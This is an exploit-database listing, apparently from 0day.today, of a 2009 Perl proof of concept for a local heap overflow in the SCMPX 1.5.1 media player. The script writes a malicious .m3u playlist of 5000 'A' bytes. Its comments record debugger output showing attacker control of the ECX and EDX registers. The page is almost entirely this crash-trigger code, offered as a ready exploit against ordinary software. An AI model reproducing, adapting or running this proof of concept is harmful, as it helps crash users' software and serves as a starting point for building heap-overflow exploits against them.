[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SCMPX 1.5.1 (.m3u File) Local Heap Overflow PoC

Author
hack4love
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6895
Category
dos / poc
Date add
28-06-2009
Platform
unsorted
===============================================
SCMPX 1.5.1 (.m3u File) Local Heap Overflow PoC
===============================================


#!/usr/bin/perl
#
#
# ###############################################################################
# SCMPX 1.5.1 (.m3u File) Local Heap Overflow PoC
# ###############################################################################

# Found By :: HACK4LOVE

## Olly registers
#EAX 00A71FF8
#ECX 41414141 _____>>control over the register
#EDX 41414141
#EBX 00000180
#ESP 0012E758
#EBP 0012E778
#ESI 00000008
#EDI 00000017
#EIP 00465B25 SCMPX.00465B25
##################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.M3U');
print myfile $crash;
##################################################################################



#  0day.today [2024-06-03]  #